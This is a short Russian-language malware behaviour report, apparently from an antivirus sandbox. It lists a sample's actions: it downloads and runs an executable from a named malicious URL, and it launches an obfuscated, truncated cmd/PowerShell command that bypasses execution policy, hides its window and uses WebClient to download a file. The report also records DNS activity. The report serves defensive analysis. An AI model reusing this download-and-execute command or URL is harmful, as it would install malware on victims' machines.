Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://sensetunoespossible.cat/wp-admin/css/colors/blue/grandv_crypted.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "Pow^erShEll^.^e^x^e -^ExECUt^i^o^n^Po^lIc^y b^ypa^S^S -^NOP^rO^fiL^E^ -^Wi^N^d^O^Ws^T^Yle hI^Dde^n^ ^(^nEW-O^b^j^ecT^ s^y^ST^Em.nET.w^eB^C^liEN^T)^.^d^ow^N^LOAdfIl^E('http:/...
Сетевая активность
UDP
- DNS ASK se#####noespossible.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "Pow^erShEll^.^e^x^e -^ExECUt^i^o^n^Po^lIc^y b^ypa^S^S -^NOP^rO^fiL^E^ -^Wi^N^d^O^Ws^T^Yle hI^Dde^n^ ^(^nEW-O^b^j^ecT^ s^y^ST^Em.nET.w^eB^C^liEN^T)^.^d^ow^N^LOAdfIl^E('http:/...' (со скрытым окном)
